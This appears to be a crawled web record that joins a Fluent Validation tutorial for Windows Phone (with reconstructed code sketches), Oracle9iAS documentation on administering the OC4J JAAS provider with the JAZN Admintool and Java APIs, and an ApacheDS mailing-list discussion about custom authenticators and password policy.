>> > grained control over authentication delegation. With the administrative
>> > model you can specify subtree specifications and refinements that will
>> > select specific entries in the DIT. When a bind occurs against selected
>> > areas different delegation mechanisms can be associated with those
>> > selections using subentries associated with them. This prescriptive
>> > specification of selected entries allows you to specify bind principals
>> > and
>> > DIT regions that do not even exist and still enable delegated
>> > authentication. This might be good especially if you don't want to deal
>> > with
>> > recreating entries for all users in AD for example.
>> > Multiple External Authentication Mechanisms
>> > ----------------------------------------------------------------
>> > Now you might not just be delegating to AD but to for example OpenID. So
>> > it
>> > would be nice to be able to allow for any kind of delegated
>> > authentication
>> > to occur. The delegation machinery leveraging the administration model
>> > for
>> > selection can be generic yet the subentries that map the selection to an
>> > external authentication mechanism can use pluggable mechanisms like AD
>> > or
>> > OpenID. Even PAM like behavior can be enabled in a stack.
>> >
>> > LDAP Principle to External Mechanism Mapping
>> > --------------------------------------------------------------------
>> > Whether or not the bind principal exists inside ApacheDS or not, we may
>> > have
>> > to transform or rather map that principal into the namespace of the
>> > external
>> > authentication mechanism. The way this is done will be mechanism
>> > dependent
>> > obviously.
>> > If prescriptive delegation occurs leveraging the administrative model
>> > then
>> > it's possible to have 1:1 mapping between ApacheDS principals to
>> > ActiveDirectory principals without the need to have mirrored entries in
>> > ApacheDS for ActiveDirectory users.
>> > If prescriptive delegation is not used and AD users are mirrored in
>> > ApacheDS
>> > with a 1:1 mapping of distinguishedNames then there's no need for
>> > mapping.
>> > Users will have to set out to design their DIT in this manner to reflect
>> > their AD layout of users. This might be tedious and cause other
>> > problems.
>> > Anyways without the 1:1 mapping even when the external authentication
>> > mechanism is another LDAP server like AD, we're going to have to manage
>> > principle name transformations/mappings.
>> > Just wanted to transfer these thoughts to the group but please don't
>> > presume
>> > I am expecting these approaches to be implemented in the first
>> > incarnation
>> > or at all even. This is knowledge gathered over years from enterprise
>> > user
>> > feedback and we should have them at least in mind.
>> >>
>> >> I'm pretty sure it's not such a big deal, but we need time, and we have
>> >> little :) I would suggest we follow closely Antoine's effort and try to
>> >> leverage what he is doing to improve the server *and* the
>> >> documentation...
>> >>
>> >
>> > +1
>> > --
>> > Alex Karasulu
>> > My Blog ::
>> > Apache Directory Server ::
>> > Apache MINA ::
>> > To set up a meeting with me:
>> >
>>
>>
>>
>> --
>> Kiran Ayyagari
>
>
>
> --
> Alex Karasulu
> My Blog ::
> Apache Directory Server ::
> Apache MINA ::
> To set up a meeting with me:
>
--
Kiran Ayyagari
|
http://mail-archives.apache.org/mod_mbox/directory-dev/201011.mbox/%3CAANLkTi=8Xt0PS2BJiKCkV4c2G2tj0h4=MGTorfwobtt7@mail.gmail.com%3E
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
After about 8 years of C and bourne, I finally decided to learn a decent language. And by learn, I mean learn from the beginning, as a baby: making things clean, trying to forget crappy things I made in the past. So, I decided to choose Vala for testing my fresh baby brain. This first post on Vala is the beginning of a step-by-step introduction to this language for people who know C or C++.
first, read This Hello World in Vala
Here is a variant, whose goal is to demonstrate how to use a program's arguments and how to get an array's length:
using GLib;
public class Tutorial.CommandLineArgs : GLib.Object {
public static void main(string[] args) {
for (uint i=1; i< args.length; i++)
stdout.printf("Hello, %s. ",args[i]);
stdout.printf("My name is %s\n", args[0]);
}
}
Here you see the declaration of an array of strings which I called args, and another declaration: an unsigned integer variable named i. Then you see the length member of the array type. Finally you see how to access an array's cell.
Question from the baby: how do you get the real basename of args[0], knowing basename() from <libgen.h> or g_path_get_basename() from GLib? Reply: to access g_path_get_basename() from GLib, Vala has this naming convention: GLib.Path.get_basename(). Now it's up to you to make a better hello people program.
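For example (untested, but using only the binding mentioned above), the greeting line of the program could become:
stdout.printf("My name is %s\n", GLib.Path.get_basename(args[0]));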
|
http://www.advogato.org/person/groom/diary.html?start=49
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
02 September 2008 10:23 [Source: ICIS news]
LONDON (ICIS news)--NYMEX light sweet crude futures plummeted by almost $10.00/bbl on Tuesday to take the front month October contract close to $105.50/bbl after reports Hurricane Gustav had caused minimal damage to oil facilities in the US Gulf.
By 09:16 GMT, October NYMEX crude had hit a low of $105.53/bbl, a loss of $9.93/bbl from Monday’s close of $116.65/bbl, before recovering to around $107.16/bbl.
At the same time, October Brent crude on
The US National Hurricane Center downgraded Gustav to a category one storm as it made landfall near Port Fourchon, Louisiana.
Maximum sustained wind speeds have decreased to 45 miles/hour (75 km/hour), from earlier reported speeds of 115 miles/hour with continued weakening forecast, the centre said, adding Gustav was expected to become a tropical depression later on Tuesday.
|
http://www.icis.com/Articles/2008/09/02/9153259/us-crude-plummets-10bbl-as-gustav-passes.html
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
In this tutorial, we will go over several ways to subset a dataframe. If you are importing data into Python, then you must be aware of data frames. A DataFrame is a two-dimensional data structure, i.e., data is aligned in a tabular fashion in rows and columns.
Subsetting a data frame is the process of selecting a set of desired rows and columns from the data frame.
You can select:
- all rows and limited columns
- all columns and limited rows
- limited rows and limited columns.
Subsetting a data frame is important as it allows you to access only a certain part of the data frame. This comes in handy when you want to reduce the number of parameters in your data frame.
Let’s start with importing a dataset to work on.
Importing the Data to Build the Dataframe
In this tutorial we are using the California Housing dataset.
Let’s start with importing the data into a data frame using pandas.
import pandas as pd
housing = pd.read_csv("/sample_data/california_housing.csv")
housing.head()
Our csv file is now stored in the housing variable as a Pandas data frame.
Select a Subset of a Dataframe using the Indexing Operator
Indexing Operator is just a fancy name for square brackets. You can select columns, rows, and a combination of rows and columns using just the square brackets. Let’s see this in action.
1. Selecting Only Columns
To select a column using indexing operator use the following line of code.
housing['population']
This line of code selects the column with label as ‘population’ and displays all row values corresponding to that.
You can also select multiple columns using indexing operator.
housing[['population', 'households' ]]
To subset a dataframe and store it, use the following line of code :
housing_subset = housing[['population', 'households' ]]
housing_subset.head()
This creates a separate data frame as a subset of the original one.
2. Selecting Rows
You can use the indexing operator to select specific rows based on certain conditions.
For example to select rows having population greater than 500 you can use the following line of code.
population_500 = housing[housing['population']>500]
population_500
You can also further subset a data frame. For example, let’s try and filter rows from our housing_subset data frame that we created above.
population_500 = housing_subset[housing['population']>500]
population_500
Note that the two outputs above have the same number of rows (which they should).
Subset a Dataframe using Python .loc()
.loc indexer is an effective way to select rows and columns from the data frame. It can also be used to select rows and columns simultaneously.
An important thing to remember is that .loc() works on the labels of rows and columns. After this, we will look at .iloc() that is based on an index of rows and columns.
1. Selecting Rows with loc()
To select a single row using .loc() use the following line of code.
housing.loc[1]
To select multiple rows use :
housing.loc[[1,5,7]]
You can also slice the rows between a starting index and ending index.
housing.loc[1:7]
2. Selecting rows and columns
To select specific rows and specific columns out of the data frame, use the following line of code :
housing.loc[1:7,['population', 'households']]
This line of code selects rows from 1 to 7 and columns corresponding to the labels ‘population’ and ‘housing’.
Subset a Dataframe using Python iloc()
The iloc() function is short for integer location. It works entirely on integer indexing for both rows and columns.
To select a subset of rows and columns using iloc() use the following line of code:
housing.iloc[[2,3,6], [3, 5]]
This line of code selects row number 2, 3 and 6 along with column number 3 and 5.
Using iloc saves you from writing the complete labels of rows and columns.
You can also use iloc() to select rows or columns individually just like loc() after replacing the labels with integers.
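For instance, the following lines (the column positions are only illustrative and depend on the dataset's layout) select the first five rows, and then every row of just two columns:
housing.iloc[0:5]          # rows 0 through 4, all columns
housing.iloc[:, [3, 5]]    # all rows, the columns at positions 3 and 5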
Conclusion
This tutorial was about subsetting a data frame in python using square brackets, loc and iloc. We learnt how to import a dataset into a data frame and then how to filter rows and columns from the data frame.
|
https://www.askpython.com/python/examples/subset-a-dataframe
|
CC-MAIN-2021-31
|
en
|
refinedweb
|
We can refresh a webpage using Selenium webdriver in Python. This can be done with the help of the refresh method. First of all, we have to launch the application with the get method.
Once a web page is loaded completely, we can then refresh the page with the help of the refresh method. This way the existing page gets refreshed. The refresh method is to be applied on the webdriver object.
driver.get("") driver.refresh()
from selenium import webdriver
#set chromedriver.exe path
driver = webdriver.Chrome(executable_path="C:\\chromedriver.exe")
driver.implicitly_wait(0.5)
#launch URL
driver.get("")
#identify text box
m = driver.find_element_by_class_name("gLFyf")
#send input
m.send_keys("Java")
#refresh page
driver.refresh()
|
https://www.tutorialspoint.com/how-to-refresh-a-webpage-using-python-selenium-webdriver
|
CC-MAIN-2021-31
|
en
|
refinedweb
|
CURLOPT_PROXYUSERPWD explained
NAME
CURLOPT_PROXYUSERPWD - user name and password to use for proxy authentication
SYNOPSIS
#include <curl/curl.h>
CURLcode curl_easy_setopt(CURL *handle, CURLOPT_PROXYUSERPWD, char *userpwd);
DESCRIPTION
Pass a char * as parameter, which should be a string in the format [user name]:[password] to use for the connection to the HTTP proxy. Both the user name and the password are URL decoded before use, so a colon in the user name must be encoded as %3A. (This is different to how CURLOPT_USERPWD is used - beware.)
Use CURLOPT_PROXYAUTH to specify the authentication method.
The application does not have to keep the string around after setting this option.
DEFAULT
PROTOCOLS
Used with all protocols that can use a proxy
EXAMPLE
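A minimal sketch (the URL, proxy address, and credentials are placeholders):
CURL *curl = curl_easy_init();
if(curl) {
  curl_easy_setopt(curl, CURLOPT_URL, "http://example.com/");
  /* route the transfer through this proxy */
  curl_easy_setopt(curl, CURLOPT_PROXY, "http://localhost:8080");
  /* authenticate to the proxy as user:password */
  curl_easy_setopt(curl, CURLOPT_PROXYUSERPWD, "user:secret");
  curl_easy_perform(curl);
  curl_easy_cleanup(curl);
}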
RETURN VALUE
Returns CURLE_OK if proxies are supported, CURLE_UNKNOWN_OPTION if not, or CURLE_OUT_OF_MEMORY if there was insufficient heap space.
SEE ALSO
CURLOPT_PROXY, CURLOPT_PROXYTYPE
|
https://curl.haxx.se/libcurl/c/CURLOPT_PROXYUSERPWD.html
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
SystemParametersInfoA function
Retrieves or sets the value of one of the system-wide parameters. This function can also update the user profile while setting a parameter.
Syntax
BOOL SystemParametersInfoA( UINT uiAction, UINT uiParam, PVOID pvParam, UINT fWinIni );
Parameters
uiAction
Type: UINT
The system-wide parameter to be retrieved or set. The possible values are organized in the following tables of related parameters:
The following are the accessibility parameters.
The following are the desktop parameters.
The following are the icon parameters.
The following are the input parameters. They include parameters related to the keyboard, mouse, pen, input language, and the warning beeper.
The following are the menu parameters.
The following are the power parameters.
Beginning with Windows Server 2008 and Windows Vista, these power parameters are not supported. Instead, to determine the current display power state, an application should register for GUID_MONITOR_POWER_STATE notifications. To determine the current display power down time-out, an application should register for notification of changes to the GUID_VIDEO_POWERDOWN_TIMEOUT power setting. For more information, see Registering for Power Events.
Windows Server 2003 and Windows XP/2000: To determine the current display power state, use the following power parameters.
The following are the screen saver parameters.
The following are the time-out parameters for applications and services.
The following are the UI effects. The SPI_SETUIEFFECTS value is used to enable or disable all UI effects at once. This table contains the complete list of UI effect values.
The following are the window parameters.
uiParam
Type: UINT
A parameter whose usage and format depends on the system parameter being queried or set. For more information about system-wide parameters, see the uiAction parameter. If not otherwise indicated, you must specify zero for this parameter.
pvParam
Type: PVOID
A parameter whose usage and format depends on the system parameter being queried or set. For more information about system-wide parameters, see the uiAction parameter. If not otherwise indicated, you must specify NULL for this parameter. For information on the PVOID datatype, see Windows Data Types.
fWinIni
Type: UINT
If a system parameter is being set, specifies whether the user profile is to be updated, and if so, whether the WM_SETTINGCHANGE message is to be broadcast to all top-level windows to notify them of the change.
This parameter can be zero if you do not want to update the user profile or broadcast the WM_SETTINGCHANGE message, or it can be one or more of the following values.
Return Value
Type: BOOL
If the function succeeds, the return value is a nonzero value.
If the function fails, the return value is zero. To get extended error information, call GetLastError.
Remarks
This function is intended for use with applications that allow the user to customize the environment.
A keyboard layout name should be derived from the hexadecimal value of the language identifier corresponding to the layout. For a list of the primary language identifiers and sublanguage identifiers that make up a language identifier, see the MAKELANGID macro.
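For instance, a small sketch in C (US English is used purely as an illustration) builds such a layout name from a language identifier:
#include <windows.h>
#include <stdio.h>
void main()
{
    // MAKELANGID(LANG_ENGLISH, SUBLANG_ENGLISH_US) yields 0x0409,
    // so the corresponding primary layout name is "00000409".
    LANGID langId = MAKELANGID(LANG_ENGLISH, SUBLANG_ENGLISH_US);
    char layoutName[KL_NAMELENGTH];
    sprintf_s(layoutName, KL_NAMELENGTH, "%08X", (unsigned int)langId);
    // layoutName can now be passed to functions such as LoadKeyboardLayout.
}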
There is a difference between the High Contrast color scheme and the High Contrast Mode. The High Contrast color scheme changes the system colors to colors that have obvious contrast; you switch to this color scheme by using the Display Options in the control panel. The High Contrast Mode, which uses SPI_GETHIGHCONTRAST and SPI_SETHIGHCONTRAST, advises applications to modify their appearance for visually-impaired users. It involves such things as audible warning to users and customized color scheme (using the Accessibility Options in the control panel). For more information, see HIGHCONTRAST. For more information on general accessibility features, see Accessibility.
During the time that the primary button is held down to activate the Mouse ClickLock feature, the user can move the mouse. After the primary button is locked down, releasing the primary button does not result in a WM_LBUTTONUP message. Thus, it will appear to an application that the primary button is still down. Any subsequent button message releases the primary button, sending a WM_LBUTTONUP message to the application, thus the button can be unlocked programmatically or through the user clicking any button.
This API is not DPI aware, and should not be used if the calling thread is per-monitor DPI aware. For the DPI-aware version of this API, see SystemParametersInfoForDPI. For more information on DPI awareness, see the Windows High DPI documentation.
Examples
The following example uses SystemParametersInfo to double the mouse speed.
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "user32.lib")

void main()
{
    BOOL fResult;
    int aMouseInfo[3];    // Array for mouse information

    // Get the current mouse speed.
    fResult = SystemParametersInfo(SPI_GETMOUSE,   // Get mouse information
                                   0,              // Not used
                                   &aMouseInfo,    // Holds mouse information
                                   0);             // Not used

    // Double it.
    if( fResult )
    {
        aMouseInfo[2] = 2 * aMouseInfo[2];

        // Change the mouse speed to the new value.
        SystemParametersInfo(SPI_SETMOUSE,      // Set mouse information
                             0,                 // Not used
                             aMouseInfo,        // Mouse information
                             SPIF_SENDCHANGE);  // Update Win.ini
    }
}
Requirements
See Also
SystemParametersInfoForDPI
|
https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-systemparametersinfoa
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
Heap Sort:
Heap sort is a comparison-based sorting technique based on the Binary Heap data structure. It is similar to selection sort, where we first find the maximum element and place it at the end. We repeat the same process for the remaining elements.
Binary Heap:
Let us first define a Complete Binary Tree. A complete binary tree is a binary tree in which every level, except possibly the last, is completely filled, and all nodes are as far left as possible. A Binary Heap is a complete binary tree in which the value in each parent node is greater than (in a max heap) or smaller than (in a min heap) the values in its children.
Program to implement Heap Sort in C++
#include <iostream>
using namespace std;

void max_heapify(int *a, int i, int n)
{
    int j, temp;
    temp = a[i];
    j = 2*i;
    while (j <= n)
    {
        if (j < n && a[j+1] > a[j])
            j = j+1;
        if (temp > a[j])
            break;
        else if (temp <= a[j])
        {
            a[j/2] = a[j];
            j = 2*j;
        }
    }
    a[j/2] = temp;
    return;
}

void heapsort(int *a, int n)
{
    int i, temp;
    for (i = n; i >= 2; i--)
    {
        temp = a[i];
        a[i] = a[1];
        a[1] = temp;
        max_heapify(a, 1, i - 1);
    }
}

void build_maxheap(int *a, int n)
{
    int i;
    for (i = n/2; i >= 1; i--)
    {
        max_heapify(a, i, n);
    }
}

int main()
{
    int n, i, x;
    cout<<"Enter no of elements of array\n";
    cin>>n;
    int a[20];
    for (i = 1; i <= n; i++)
    {
        cout<<"Enter element"<<(i)<<endl;
        cin>>a[i];
    }
    build_maxheap(a,n);
    heapsort(a, n);
    cout<<"\n\nSorted Array\n";
    for (i = 1; i <= n; i++)
    {
        cout<<a[i]<<endl;
    }
    return 0;
}
Sample Output:
Enter no of elements of array
5
Enter element1
3
Enter element2
8
Enter element3
9
Enter element4
3
Enter element5
2

Sorted Array
2
3
3
8
9
|
https://proprogramming.org/heap-sort-in-c/
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
Talk:Date specification
- if there are real ambiguities in the previous version of the document please point out which precisely
- fixed numbers of digits etc can't be enforced. If you don't know on which day of 1761 a road was opened it would be wrong to enter a fake day/month just to simplify parsing. Hence relying on this will only lead to greater ambiguity and filtering/searching tags will work worse.
- while parsing of the original format may appear complex its is only a slight variation of the standard which is fairly widely implemented, the programmers point view in a very similar case has been also discussed here: Talk:Proposed_features/Date_namespace#It_is_awful_from_the_point_of_view_of_querying_and_data_processing
RicoZ (talk) 16:03, 19 April 2017 (UTC)
- PArsing ambiguities is all about this. But the double-hyphen is not required and almost never used anywhere. Most tags never use them for date range, because they are not needed for correct parsing.
- The format of individual dates should still honor the ISO format, with 4-digit years, and 2-digits months and days of month. Hever you really looked at the data and how dates are really parsed and entered in the database?
- It is just enough to signal cases where ambiguities occur, but with the ISO format enforced (with required hyphen separators between elements), we can easily determine where there's a date range or not: the double hyphen is never needed if 4-digit years are present (and this is almost always the case in most tags). As well requiring hyphens between date elements (ISO format) means that "1761" is unambiguously a year, not a fake month and a 2 year: all date elements have a fixed number of digits (2 or 4).
- Beside this there's another (more complex) specification for opening_hours that allows specifying dates partially, with repetitions or other conditions. — Verdy_p (talk) 20:05, 19 April 2017 (UTC)
- Pardon? I have parsing ambiguities with your text. Can you just answer my concerns point by point? And no, this wikipage has been in place for just too long so you can not replace it with something diametraly opposing without prior discussion. RicoZ (talk) 22:36, 19 April 2017 (UTC)
- But your text contradicts many existing uses in the database. No there's not any ambiguity. You've introduced requirements that did not exist, by not looking at existing data (since longer time than your text).
- You've been strictly alone to put that text in 2014, without ever discussing it and without checking what was in the database long before. It has been rapoidly corrected to include the current practices, and you've made compeltely false assumptions about the ISO 8601 format and your supposed "backward compatibility". the "--" has never been recommended anywhere by anyone except you. The correction has been rapidly made when you linked your page to other pages because it was wrong (and also incoimpatible with the adopted schemd for opening_hours where this was discussed and where "-" is used consistently.
- Your reverts are like if you want to ignore all current best practices. You made errors but cannot admit it.
- I've not removed your proposal to use "--", but it is definitely not needed at all :
- it's not compatible with ISO 8601 (unlike what you wrote, which is false)
- it is not backward compatible (unlike what you wrote, which is false)
- it has never been discussed and approved (unlike what you wrote, which is false)
- it is not the common practice (unlike what you wrote, which is false)
- it is not even needed for standard date ranges (with years)
- and for monthly and yearly recurrent date (the only case where "--" is usable) it is NOT what was adopted and discussed with the opening hours (that uses "-" only, but makes distinctions using 3-letter abbreviated month names instead of month number)
- For this reason I do think that even you proposal should be rejected. Only "-" should be kept and only for date ranges with years (and NO: this does not create any ambiguity), the other cases (with missing years) being trated with opening_hours prefered to your "--" proposal (incorrectly justified).
- And visibly you don't know what the ISO 8601 standard says about validity of formats.
- What are parsing problems? You spoke about "1761" alone but there's no ambiguity at all, it is only a year. Give only one example! You can't. Your 2014 text was invalid (and not discussed at all otherwise you would have seen the problem that it was not working like this in MANY existing data).
- Summary: you did not perform any search, you just wanted to document some specific cases you have used locally in your region of interest or for some tags).
- I did not invalidate your personal (undiscussed) "--" proposal for date ranges, but added what was already used (with a single "-" almost everywhere). And I made sure that the ISO 8601 format was respected ("80-1-1" is NOT a valid ISO date format, "1980-01-01" is valid and works with simpler parsers)
- — Verdy_p (talk) 23:35, 19 April 2017 (UTC)
- If you had read the ISO 8601 standard correctly, "--" was already used in an older version for dates with missing years (this feature has been removed: ISO formats must start by a 4-digit year, possibly prefixed by a sign by years in BCE and there's no "0000"). Date intervals in ISO 8601 use a slash "/" instead... Your "--" is an invention by you only, not used by anyone else. — Verdy_p (talk) 23:50, 19 April 2017 (UTC)
- Sure it has been a while ago that I wrote this text. It has not been questioned until you came so there was no discussion. There is at least one existing implementation (independent of me) which proves that it works. Have you tried to implement your idea? You are making it more complicated to implement, it is more verbose, it is more error prone - why?? Just to avoid the use of "--" in some cases? I see you made some improvements of your idea however there still many things which at this point are unclear to me or dubious. Did I anywhere claim that "80-1-1" was a valid date? If you have this impression I don't object to claryfing that this is indeed not a valid date. However 1980-1-1 is a valid date. Also, in your latest version ( [2] ) you contradict your own claim (above) that a double hyphen is not needed at all.
- This page was never meant to replace or compete with the opening hours date specification, they are for different purposes.
- Looking again at the state of ISO8601 and related standards I notice that many things changed since I wrote this proposal so it is a good idea to look at it again.
- At this point we should make a step back and regard your and mine variants as proposals. So please restore my original proposal, create your proposal and move both to the proposal space. Then we can both work on our proposals and probably agree on something. RicoZ (talk) 21:05, 21 April 2017 (UTC)
- It is not "my idea" but the most common practice currently in OSM. Only you seem to support the "--" which is not compatible with ISO 8601 and causes ambiguities.
- Yes the "-" separator is used since very long (long before your undiscussed proposal you wrote in mid-2014 without checking).
- And franky I don't understand why you think your idea is simpler when in fact it was inconsistant, and also incompatible with the openin_hours (that has been discussed a lot and also using "-" with the promiss to be also compatible with simple date ranges writting with "-", not with "--" that you are alone to support and which is used by almost no one (except those that have read your page during a short period after you linked it to other pages.
- But I've not removed your proposal, I just iunk it is not even needed at all. "--" for date ranges has never been part of any standard. But many applications and users expect a single "-" (or an en-dash=half-cadratin hyphen, not an em-dash=cadratin hyphen)
- Note also that "1980-1-1 is NOT valid in ISO8601. Standard dsate ranges MUST start by a year any way and that year must be written with 4 digits. This means that the "-" separator coming in a date range can only come before 4 digits for the year (or occurs at start or end for open-ended ranges, that are also not ambiguous at all). There's never any ambiguity for standard date ranges.
- But I only note that it could have been needed for recurrent monthly or yearly date ranges omitting years, but another solution was adopted for recurrent dates, i.e. the opening_hours specification, where months in this case are written with 3 letters, not digits, and where recurrent ranges of days in one month are also written as two digits (avoiding all confusion of these days with years that must have 4 digits).
- All practives adopted require the fixed number of digits (2 for months and days, 4 digits for years).
- When you reverted my old edit, you have wanted to erase a practice that was used since longer tyhan your proposal, as if it did not exist, even if it was already used massively and caused absolutely no interpretation problem for anyone. Once again it was not "my idea" but an idea already used by many people and already widely understood.
- The only alternative I've seen in some tags is to add extra spaces around "-" in date ranges, but only for typographical purpose (in that case the "-" should also become a typographic en-dash, including in opening_hours; this is not needed: a typographic representation would depend on the language used, and would also reformat the dates in national formats as well instead of IOS8601 format, possibly with non ASCII digits in Arabic, Farsi, Chinese, Japanese...). For this reason even these spaces are not needed: a renderer that would display those dates for a language/typographic convention would rewrite the value completely, but we won't do that in OSM tags where they are meant to be used for technical use, and hould have a form easily parsable without unneeded variants: the simplest and most efficient parsers will prefer keeping only the strict ISO format for dates, and don't need extra characters such as a second "-" which may cause unmodified ISO8601 parsers to break. — Verdy_p (talk) 01:21, 22 April 2017 (UTC)
|
https://wiki.openstreetmap.org/wiki/Talk:Date_specification
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
What's new for Visual Basic
This topic lists key feature names for each version of Visual Basic, with detailed descriptions of the new and enhanced features in the latest versions of the language.
Current version
Visual Basic 15.5 / Visual Studio 2017 Version 15.5
For new features, see Visual Basic 15.5
Previous versions
Visual Basic 15.3 / Visual Studio 2017 Version 15.3
For new features, see Visual Basic 15.3
Visual Basic 2017 / Visual Studio 2017
For new features, see Visual Basic 2017
Visual Basic / Visual Studio 2015
For new features, see Visual Basic 14
Visual Basic / Visual Studio 2013
Technology previews of the .NET Compiler Platform (“Roslyn”)
Visual Basic / Visual Studio 2012
Async and await keywords, iterators, caller info attributes
Visual Basic, Visual Studio 2010
Auto-implemented properties, collection initializers, implicit line continuation, dynamic, generic co/contra variance, global namespace access
Visual Basic / Visual Studio 2008
Language Integrated Query (LINQ), XML literals, local type inference, object initializers, anonymous types, extension methods, local var type inference, lambda expressions, if operator, partial methods, nullable value types
Visual Basic / Visual Studio 2005
The My type and helper types (access to app, computer, file system, network)
Visual Basic / Visual Studio .NET 2003
Bit-shift operators, loop variable declaration
Visual Basic / Visual Studio .NET 2002
The first release of Visual Basic .NET
Visual Basic 15.5
Non-trailing named arguments
In Visual Basic 15.3 and earlier versions, when a method call included arguments both by position and by name, positional arguments had to precede named arguments. Starting with Visual Basic 15.5, positional and named arguments can appear in any order as long as all arguments up to the last positional argument are in the correct position. This is particularly useful when named arguments are used to make code more readable.
For example, the following method call has a named argument between two positional arguments. The named argument makes it clear that the value 19 represents an age.
StudentInfo.Display("Mary", age:=19, #9/21/1998#)
Private Protected member access modifier
This new keyword combination defines a member that is accessible by all members in its containing class as well as by types derived from the containing class, but only if they are also found in the containing assembly. Because structures cannot be inherited, Private Protected can only be applied to the members of a class.
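A short sketch (the class and member names are made up for illustration):

Public Class BaseNode
    ' Visible to this class and to derived classes, but only inside this assembly.
    Private Protected Property NodeId As Integer
End Class

Public Class LeafNode
    Inherits BaseNode

    Public Sub Describe()
        ' Allowed: LeafNode derives from BaseNode and lives in the same assembly.
        Console.WriteLine($"Node {NodeId}")
    End Sub
End Class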
Leading hex/binary/octal separator
Visual Basic 2017 added support for the underscore character (_) as a digit separator. Starting with Visual Basic 15.5, you can use the underscore character as a leading separator between the prefix and hexadecimal, binary, or octal digits. The following example uses a leading digit separator to define 3,271,948,384 as a hexadecimal number:
Dim number As Integer = &H_C305_F860
To use the underscore character as a leading separator, you must add the following element to your Visual Basic project (*.vbproj) file:
<PropertyGroup> <LangVersion>15.5</LangVersion> </PropertyGroup>
Visual Basic 15.3
When you assign the value of tuple elements from variables, Visual Basic infers the name of tuple elements from the corresponding variable names; you do not have to explicitly name a tuple element. The following example uses inference to create a tuple with three named elements, state, stateName, and capital.
Dim state = "MI" Dim stateName = "Michigan" Dim capital = "Lansing" Dim stateInfo = ( state, stateName, capital ) Console.WriteLine($"{stateInfo.stateName}: 2-letter code: {stateInfo.State}, Capital {stateInfo.capital}") ' The example displays the following output: ' Michigan: 2-letter code: MI, Capital Lansing
Additional compiler switches
The Visual Basic command-line compiler now supports the -refout and -refonly compiler options to control the output of reference assemblies. -refout defines the output directory of the reference assembly, and -refonly specifies that only a reference assembly is to be output by compilation.
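For example (the file and output names are placeholders), the following invocations emit a reference assembly next to the implementation assembly, or a reference assembly only:
vbc -target:library -refout:ref\MyLib.dll MyLib.vb
vbc -target:library -refonly MyLib.vb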
Visual Basic 2017
Tuples are a lightweight data structure that most commonly is used to return multiple values from a single method call. Ordinarily, to return multiple values from a method, you have to do one of the following:
Define a custom type (a Class or a Structure). This is a heavyweight solution.
Define one or more ByRef parameters, in addition to returning a value from the method.
Visual Basic's support for tuples lets you quickly define a tuple, optionally assign semantic names to its values, and quickly retrieve its values. The following example wraps a call to the TryParse method and returns a tuple.
Imports System.Globalization

Public Module NumericLibrary
    Public Function ParseInteger(value As String) As (Success As Boolean, Number As Int32)
        Dim number As Integer
        Return (Int32.TryParse(value, NumberStyles.Any, CultureInfo.InvariantCulture, number), number)
    End Function
End Module
You can then call the method and handle the returned tuple with code like the following.
Dim numericString As String = "123,456"
Dim result = ParseInteger(numericString)
Console.WriteLine($"{If(result.Success, $"Success: {result.Number:N0}", "Failure")}")
Console.ReadLine()
' Output: Success: 123,456
Binary literals and digit separators
You can define a binary literal by using the prefix &B or &b. In addition, you can use the underscore character, _, as a digit separator to enhance readability. The following example uses both features to assign a Byte value and to display it as a decimal, hexadecimal, and binary number.
Dim value As Byte = &B0110_1110
Console.WriteLine($"{NameOf(value)} = {value} (hex: 0x{value:X2}) " +
                  $"(binary: {Convert.ToString(value, 2)})")
' The example displays the following output:
'    value = 110 (hex: 0x6E) (binary: 1101110)
For more information, see the "Literal assignments" section of the Byte, Integer, Long, Short, SByte, UInteger, ULong, and UShort data types.
Support for C# reference return values
Starting with C# 7.0, C# supports reference return values. That is, when the calling method receives a value returned by reference, it can change the value of the reference. Visual Basic does not allow you to author methods with reference return values, but it does allow you to consume and modify the reference return values.
For example, the following Sentence class written in C# includes a FindNext method that finds the next word in a sentence that begins with a specified substring. The string is returned as a reference return value, and a Boolean variable passed by reference to the method indicates whether the search was successful. This means that the caller can not only read the returned value; he or she can also modify it, and that modification is reflected in the Sentence class.
using System;

public class Sentence
{
    private string[] words;
    private int currentSearchPointer;

    public Sentence(string sentence)
    {
        words = sentence.Split(' ');
        currentSearchPointer = -1;
    }

    public ref string FindNext(string startWithString, ref bool found)
    {
        for (int count = currentSearchPointer + 1; count < words.Length; count++)
        {
            if (words[count].StartsWith(startWithString))
            {
                currentSearchPointer = count;
                found = true;
                return ref words[currentSearchPointer];
            }
        }
        currentSearchPointer = -1;
        found = false;
        return ref words[0];
    }

    public string GetSentence()
    {
        string stringToReturn = null;
        foreach (var word in words)
            stringToReturn += $"{word} ";

        return stringToReturn.Trim();
    }
}
In its simplest form, you can modify the word found in the sentence by using code like the following. Note that you are not assigning a value to the method, but rather to the expression that the method returns, which is the reference return value.
Dim sentence As New Sentence("A time to see the world is now.")
Dim found = False
sentence.FindNext("A", found) = "A good"
Console.WriteLine(sentence.GetSentence())
' The example displays the following output:
'    A good time to see the world is now.
A problem with this code, though, is that if a match is not found, the method returns the first word. Since the example does not examine the value of the Boolean argument to determine whether a match is found, it modifies the first word if there is no match. The following example corrects this by replacing the first word with itself if there is no match.
Dim sentence As New Sentence("A time to see the world is now.")
Dim found = False
sentence.FindNext("A", found) = IIf(found, "A good", sentence.FindNext("B", found))
Console.WriteLine(sentence.GetSentence())
' The example displays the following output:
'    A good time to see the world is now.
A better solution is to use a helper method to which the reference return value is passed by reference. The helper method can then modify the argument passed to it by reference. The following example does that.
Module Example
    Public Sub Main()
        Dim sentence As New Sentence("A time to see the world is now.")
        Dim found = False
        Dim returns = RefHelper(sentence.FindNext("A", found), "A good", found)
        Console.WriteLine(sentence.GetSentence())
    End Sub

    Private Function RefHelper(ByRef stringFound As String, replacement As String, success As Boolean) _
                     As (originalString As String, found As Boolean)
        Dim originalString = stringFound
        If success Then stringFound = replacement
        Return (originalString, success)
    End Function
End Module
' The example displays the following output:
'    A good time to see the world is now.
For more information, see Reference Return Values.
Visual Basic 14
You can use string interpolation expressions to construct strings. An interpolated string expression looks like a template string that contains expressions. An interpolated string is easier to understand with respect to arguments than Composite Formatting.
Null-conditional member access and indexing
